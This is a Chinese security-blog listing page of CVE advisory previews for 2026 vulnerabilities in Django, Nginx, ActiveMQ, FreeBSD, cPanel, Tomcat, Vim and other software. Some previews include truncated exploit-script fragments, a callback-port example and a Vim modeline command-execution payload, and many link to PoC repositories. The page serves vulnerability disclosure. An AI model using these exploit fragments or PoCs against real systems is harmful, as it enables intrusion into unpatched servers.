- 综合排序
- 最热优先
- 最新优先
- 来自专栏信安百科
CVE-2026-1207|Django SQL注入漏洞(POC)
0x02 CVE编号 CVE-2026-1207 0x03 影响版本 6.0之前的版本至6.0.2 5.2之前的版本至5.2.11 4.2之前的版本至4.2.28 0x04 漏洞详情 POC: GET 参考链接 https://docs.djangoproject.com/en/dev/releases/security/ https://www.djangoproject.com/weblog/2026
44310编辑于 2026-04-13 - 来自专栏kali blog
Nginx CVE-2026-42945漏洞分析及复现
2026年5月12日,NGINX 官方发布紧急安全公告,披露了一组潜伏长达 18年 的高危漏洞,其中最严重的 CVE-2026-42945(代号"NGINX Rift") 的 CVSS v4.0 评分高达 一、漏洞介绍 漏洞概况 项目 内容 CVE 编号 CVE-2026-42945 漏洞代号 NGINX Rift CVSS 评分 9.2(Critical) 漏洞类型 堆缓冲区溢出(Heap Buffer -2026-42945 外,本次还披露了另外两个漏洞: 编号 评分 说明 CVE-2026-42946 8.3(High) 关联的缓冲区处理漏洞 CVE-2026-40701 6.3(Medium) 低危信息泄露风险 远程代码执行(RCE) — 在特定配置和系统环境下实现任意代码执行,完全控制服务器 二、原理分析 漏洞本质 CVE-2026-42945 的根源在于 ngx_http_rewrite_module 重写模块中一个极其隐蔽的逻辑错误 /setup.sh docker compose -f env/docker-compose.yml up 接下来,我们利用大佬项目 https://github.com/cipherspy/CVE-2026
10.3K451编辑于 2026-05-18 - 来自专栏信安百科
CVE-2026-41044|Apache ActiveMQ代码注入漏洞
0x02 CVE编号 CVE-2026-41044 0x03 影响版本 Apache ActiveMQ (org.apache.activemq:apache-activemq) before 5.19.6 org.apache.activemq:activemq-all) 6.0.0 before 6.2.5 0x04 漏洞详情 https://activemq.apache.org/security-advisories.data/CVE -2026-41044-announcement.txt 0x05 参考链接 https://activemq.apache.org/security-advisories.data/CVE-2026- 41044-announcement.txt 推荐阅读: CVE-2026-34197|Apache ActiveMQ远程代码执行漏洞(POC) CVE-2026-40175|Axios存在CRLF注入漏洞 (POC) CVE-2026-39363|Vite存在任意文件读取漏洞(POC) Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。
27810编辑于 2026-05-08 - 来自专栏信安百科
CVE-2026-21630|Joomla的SQL注入漏洞
0x02 CVE编号 CVE-2026-21630 0x03 影响版本 Joomla!
27110编辑于 2026-04-13 - 来自专栏信安百科
CVE-2026-4747|FreeBSD栈溢出漏洞(POC)
—— ——来源于网络 0x02 CVE编号 CVE-2026-4747 0x03 影响版本 所有受支持的FreeBSD版本 0x04 漏洞详情 POC: https://github.com/califio /publications/blob/main/MADBugs/CVE-2026-4747/exploit.py #! /usr/bin/env python3 """ CVE-2026-4747 — FreeBSD kgssapi.ko RPCSEC_GSS Remote Kernel RCE ============ > --port <callback_port> python3 exploit.py -t 127.0.0.1 --ip 10.0.2.2 --port 4444 - LCFR/x 2026 -2026-4747/exploit.py https://www.freebsd.org/security/advisories/FreeBSD-SA-26:08.rpcsec_gss.asc
30710编辑于 2026-04-13 - 来自专栏信安百科
CVE-2026-22733|Spring Boot存在认证绕过漏洞
0x02 CVE编号 CVE-2026-22733 0x03 影响版本 2.7.0 <= Spring Boot < 2.7.32 3.3.0 <= Spring Boot < 3.3.18 3.4.0 3.4.15 3.5.0 <= Spring Boot < 3.5.12 4.0.0 <= Spring Boot < 4.0.4 0x04 漏洞详情 https://spring.io/security/cve -2026-22733 0x05 参考链接 https://spring.io/security/cve-2026-22733 Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。
1.4K10编辑于 2026-03-30 - 来自专栏信安百科
CVE-2026-40369|Windows内核提权漏洞(POC)
0x02 CVE编号 CVE-2026-40369 0x03 影响版本 Windows 11 Version 24H2 < 10.0.26100.8457 Windows 11 Version 24H2 10.0.26100.32860 Windows Server 2025 < 10.0.26100.32772 0x04 漏洞详情 POC: https://github.com/orinimron123/CVE -2026-40369-EXPLOIT 0x05 参考链接 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40369 推荐阅读 : CVE-2026-42945|Nginx潜藏18年的远程代码执行漏洞(POC) CVE-2026-41940|cPanel/WHM登录流程认证绕过漏洞(POC) N/A|Microsoft Defender
20210编辑于 2026-06-01 - 来自专栏信安百科
CVE-2026-32201|Microsoft SharePoint Server身份伪造漏洞
0x02 CVE编号 CVE-2026-32201 0x03 影响版本 Sharepoint Server 2016 < 16.0.5548.1003 Sharepoint Server 2019 < Sharepoint Server < 16.0.19725.20210 0x04 漏洞详情 https://msrc.microsoft.com/update-guide/vulnerability/CVE -2026-32201 0x05 参考链接 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32201 推荐阅读: CVE- 2025-53770|Microsoft SharePoint远程代码执行漏洞(POC) CVE-2026-1207|Django SQL注入漏洞(POC) CVE-2026-34714|Vim高危远程代码执行漏洞
16610编辑于 2026-05-08 - 来自专栏信安百科
CVE-2026-21440|AdonisJS远程代码执行漏洞(POC)
0x02 CVE编号 CVE-2026-21440 0x03 影响版本 @adonisjs/bodyparser <= 10.1.1 @adonisjs/bodyparser <= 11.0.0-next .5 0x04 漏洞详情 POC: https://github.com/k0nnect/cve-2026-21440-writeup #! /usr/bin/env python3 """ CVE-2026-21440 - Path Traversal Exploit for @adonisjs/bodyparser This script " class PathTraversalExploit: """ Exploit class for CVE-2026-21440 path traversal vulnerability parser = argparse.ArgumentParser( description='CVE-2026-21440 Path Traversal Exploit',
54410编辑于 2026-01-14 - 来自专栏信安百科
CVE-2026-20963|Microsoft SharePoint远程代码执行漏洞
0x02 CVE编号 CVE-2026-20963 0x03 影响版本 SharePoint Enterprise Server 2016(版本号低于 16.0.5535.1001) SharePoint Server 订阅版(版本号低于 16.0.19127.20442) 0x04 漏洞详情 https://msrc.microsoft.com/update-guide/vulnerability/CVE -2026-20963 0x05 参考链接 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20963 Ps:国内外安全热点分享
21210编辑于 2026-03-30 - 来自专栏网络安全技术点滴分享
复现(CVE-2026-21440)@adonisjsbodyparser路径遍历漏洞利用
-2026-21440-writeup-poc中的Vulnerable-App环境作为漏洞复现测试,复现的系统在ubuntu中 链接地址:https://github.com/k0nnect/cve-2026 -21440-writeup-poc.git 1.git clone或者下载cve-2026-21440-writeup-poc项目到ubuntu本地目录中,如下所示 2.在终端中切换到cve-2026 8.运行如下命令执行exploit.py程序测试CVE-2026-21440漏洞,在服务器指定目录中写入pwned.txt文件,如下所示 python3 exploit.py --url http:/ /usr/bin/env python3 """ CVE-2026-21440 - Path Traversal Exploit for @adonisjs/bodyparser 这个脚本利用 @adonisjs " class PathTraversalExploit: """ CVE-2026-21440 路径遍历漏洞的利用类。
44310编辑于 2026-01-27 - 来自专栏信安百科
CVE-2026-31938|jsPDF存在HTML注入漏洞(POC)
0x02 CVE编号 CVE-2026-31938 0x03 影响版本 jsPDF <=4.2.0 0x04 漏洞详情 POC: import { jsPDF } from 'jspdf'; const
24910编辑于 2026-03-30 - 来自专栏信安百科
CVE-2026-40175|Axios存在CRLF注入漏洞(POC)
0x02 CVE编号 CVE-2026-40175 0x03 影响版本 axios >=1.0.0 <1.15.0 axios <0.31.0 0x04 漏洞详情 POC: https://github.com /pjt3591oo/CVE-2026-40175-poc (图片来源于网络) 0x05 参考链接 https://github.com/axios /axios/security/advisories/GHSA-fvcv-3m26-pcqx 推荐阅读: CVE-2026-34197|Apache ActiveMQ远程代码执行漏洞(POC) CVE- 2025-55182|React/Next.js远程代码执行漏洞(POC) CVE-2024-34351|Next.js框架存在SSRF漏洞 Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性
80910编辑于 2026-05-08 - 来自专栏信安百科
CVE-2026-33371|Zimbra存在XML外部实体(XXE)漏洞
0x02 CVE编号 CVE-2026-33371 0x03 影响版本 Zimbra Collaboration Suite 10.0 Zimbra Collaboration Suite 10.1 0x04
27110编辑于 2026-03-30 - 来自专栏信安百科
CVE-2026-41940|cPanelWHM登录流程认证绕过漏洞(POC)
—— ——来源于网络 0x02 CVE编号 CVE-2026-41940 0x03 影响版本 cPanel&WHM 11.86.* < 11.86.0.41 cPanel&WHM 11.110.* < /usr/bin/env python3 # -*- coding: utf-8 -*- """ cPanelSniper.py — CVE-2026-41940 cPanel & WHM Auth Bypass Scanner Author : Mitsec (@ynsmroztas) Version : 2.0 CVE-2026-41940: Session-File CRLF Injection → ": "CVE-2026-41940", "cvss": "10.0", "timestamp": datetime.now().isoformat / 推荐阅读: N/A|Microsoft Defender本地权限提升漏洞(POC) CVE-2026-41044|Apache ActiveMQ代码注入漏洞 CVE-2026-40175|Axios
84710编辑于 2026-05-08 - 来自专栏信安百科
CVE-2026-9082|Drupal PostgreSQL高危SQL注入漏洞(POC)
0x01 漏洞描述 CVE-2026-9082是一个存在于Drupal核心的SQL注入漏洞,问题出在PostgreSQL的EntityQuery条件处理器中。 0x02 CVE编号 CVE-2026-9082 0x03 影响版本 Drupal 8.9.0 至 10.4.9 Drupal 10.5.0 至 10.5.9 Drupal 10.6.0 至 10.6.8 不受影响:MySQL、MariaDB、SQLite、SQL Server、Drupal7.x 0x04 漏洞详情 POC: https://github.com/dinosn/drupal-sa-core-2026 /usr/bin/env python3 """SA-CORE-2026-004 — Detection and validation PoC. DEFAULT_ENTITY_TYPE = "node" DEFAULT_BUNDLE = "article" DEFAULT_FIELD = "title" USER_AGENT = "sa-core-2026
14710编辑于 2026-06-02 - 来自专栏信安百科
CVE-2026-34197|Apache ActiveMQ远程代码执行漏洞(POC)
0x02 CVE编号 CVE-2026-34197 0x03 影响版本 Apache ActiveMQ Broker < 5.19.4 6.0.0 <= Apache ActiveMQ Broker < -2026-34197 #! /usr/bin/env python3 """ CVE-2026-34197 — Apache ActiveMQ RCE vía Jolokia API Ejecución remota de código -2026-34197. 1. -2026-34197-announcement.txt Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。
1.1K20编辑于 2026-04-20 - 来自专栏信安百科
CVE-2026-24061|Telnetd存在远程认证绕过漏洞(POC)
0x02 CVE编号 CVE-2026-24061 0x03 影响版本 1.9.3 <= GNU InetUtils <= 2.7 0x04 漏洞详情 POC: https://github.com/SafeBreach-Labs /CVE-2026-24061 import socket import sys import threading import time import argparse import re # -- client_sock.close() if __name__ == "__main__": main() 0x05 参考链接 https://www.openwall.com/lists/oss-security/2026
77110编辑于 2026-03-03 - 来自专栏信安百科
CVE-2026-34486|Apache Tomcat远程代码执行漏洞(POC)
0x01 漏洞描述 漏洞的出现与针对CVE-2026-29146的修复补丁有关。 0x02 CVE编号 CVE-2026-34486 0x03 影响版本 Apache Tomcat 11.0.20 Apache Tomcat 10.1.53 Apache Tomcat 9.0.116 0x04 漏洞详情 POC: https://github.com/AirSkye/CVE-2026-34486-poc #! /cve-2026-34486-repro.sh)" fi # 安装基础工具 apt-get update -qq apt-get install -y -qq wget curl python3 python3 /usr/bin/env python3 """CVE-2026-34486 PoC - EncryptInterceptor Bypass""" import socket, struct, sys,
1.4K30编辑于 2026-04-20 - 来自专栏信安百科
CVE-2026-34714|Vim高危远程代码执行漏洞(POC)
0x02 CVE编号 CVE-2026-34714 0x03 影响版本 Vim < 9.2.0276 0x04 漏洞详情 POC: vim: set tabpanel=%{os.execute("id
60410编辑于 2026-04-13
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号